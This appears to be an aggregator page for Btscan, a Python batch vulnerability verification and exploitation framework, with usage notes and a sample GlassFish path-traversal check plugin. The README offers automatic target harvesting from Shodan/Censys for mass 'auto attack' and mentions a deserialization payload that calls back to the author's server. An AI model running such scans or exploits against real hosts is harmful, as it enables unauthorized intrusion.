he1m4n6a / Btscan
批量漏洞扫描框架
Stars: ✭ 108
Programming Languages
python
139335 projects - #7 most used programming language
Labels
Projects that are alternatives of or similar to Btscan
Kube Score
Kubernetes object analysis with recommendations for improved reliability and security
Stars: ✭ 1,128 (+944.44%)
Mutual labels: security-scanner
Keynuker
🔐💥 KeyNuker - nuke AWS keys accidentally leaked to Github
Stars: ✭ 82 (-24.07%)
Mutual labels: security-scanner
Doublepulsar Detection Script
A python2 script for sweeping a network to find windows systems compromised with the DOUBLEPULSAR implant.
Stars: ✭ 977 (+804.63%)
Mutual labels: security-scanner
Censys Ruby
Ruby API client for the Censys internet-wide network-scan search engine
Stars: ✭ 8 (-92.59%)
Mutual labels: security-scanner
Patrowldocs
PatrOwl - Open Source, Free and Scalable Security Operations Orchestration Platform
Stars: ✭ 105 (-2.78%)
Mutual labels: security-scanner
Hoper
Security tool to trace URL's jumps across the rel links to obtain the last URL
Stars: ✭ 50 (-53.7%)
Mutual labels: security-scanner
Machine Learning Approach For Malware Detection
A Machine Learning approach for classifying a file as Malicious or Legitimate
Stars: ✭ 35 (-67.59%)
Mutual labels: security-scanner
Slowhttptest
Application Layer DoS attack simulator
Stars: ✭ 1,003 (+828.7%)
Mutual labels: security-scanner
Vuls
Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language libraries, Network devices
Stars: ✭ 8,844 (+8088.89%)
Mutual labels: security-scanner
Gitgot
Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.
Stars: ✭ 964 (+792.59%)
Mutual labels: security-scanner
Btle Sniffer
Passively scan for Bluetooth Low Energy devices and attempt to fingerprint them
Stars: ✭ 87 (-19.44%)
Mutual labels: security-scanner
Lynis
Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional.
Stars: ✭ 9,137 (+8360.19%)
Mutual labels: security-scanner
Vscan Go
golang version for nmap service and application version detection (without nmap installation)
Stars: ✭ 107 (-0.93%)
Mutual labels: security-scanner
Pakala
Offensive vulnerability scanner for ethereum, and symbolic execution tool for the Ethereum Virtual Machine
Stars: ✭ 97 (-10.19%)
Mutual labels: security-scanner
Intrigue Ident
Application and Service Fingerprinting
Stars: ✭ 70 (-35.19%)
Mutual labels: security-scanner
目录结构
--lib 核心文件库
--report 报告生成的文件夹
--node 里面每一个py文件是一个攻击向量,添加扫描节点也是向里面添加文件
--crawl 通过空间搜索引擎抓取url或者ip的脚本
使用方法
python btScan.py
usage: btScan.py [options]
* batch vulnerability verification and exploition framework. *
By he1m4n6a
optional arguments:
-h, --help show this help message and exit
-t THREADS Num of scan threads for each scan process, 20 by default
-m MODE select mode [config|script]
e.g. -m script
-n NAME from node floder choose a script
-c COMMAND give an instruction when use script mode [verify|exploit]
e.g. -c verify
-u URL_FILE input url file
-i IP_FILE input ip file
-autoIP get ip from space search engine and auto attack
-autoURL get url from space search engine and auto attack
-v show program's version number and exit
脚本存在两种验证模式,一种是通过加载模块,另一种是通过配置文件。复杂的可以通过加载脚本,简单的通过加载配置文件即可。然后攻击也有两种模式,验证verify模式和攻击exploit模式。 你也可以指定ip或者url作为输入格式,也可以自动获取ip或者url,那就是配合crawl文件下的网络空间抓取模块。
示例
python btscan.py -n joomla -m script -c verify -u url.txt
-n 指定node文件夹下的joomla.py,-m指定为script模式,即指定加载模块的模式。-c指定模式为验证,仅为验证就好了,-u指定输入为url的模式。
python btscan.py -n joomla -m script -c exploit -u url.txt
同上,只是指定为攻击模式。
python btscan.py -m config -c verify -i ip.txts
-m指定为config模式,-c指定为验证模式,-i指定输入的为ip模式,仅需通过conf目录下的scan_rule.ini的配置就够了。
插件编写规则
仅需要在node文件夹下新增一个py文件
py文件中重要的有两个函数verify和exploit函数,没有exploit攻击模式,仅需要verify函数,返回值有三个值,第一个值是返回是否存在漏洞,返回True或者False;第二个值是返回url,第三个值返回需要打印的信息。
示例(glassfish.py为例)
#!/usr/bin/env python
#coding=utf8
import requests
def verify(ip):
url = 'https://' + str(ip) + ':4848//theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/'
try:
r = requests.get(url, verify=False, timeout=5)
if 'ejb-timer-service-app' in r.text:
msg = 'vul'
return True, ip, msg
else:
msg = 'safe'
return False, ip, msg
except Exception, e:
#msg = str(e)
msg = 'safe'
return False, ip, msg
def exploit(ip):
verify(ip)
上面函数都可以自己定义,主要是verfiy和exploit函数,如果exploit函数和verify函数一样,exploit函数里面只要简单的调用verify(url)即可。
其他
crwal文件夹的NetSearch.py里面的shadon和censys模块的密钥要自己填上。 java反序列化的payload要自行更改,不然结果是发送到我的vps上。
有任何交流和问题可以联系我[email protected]
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].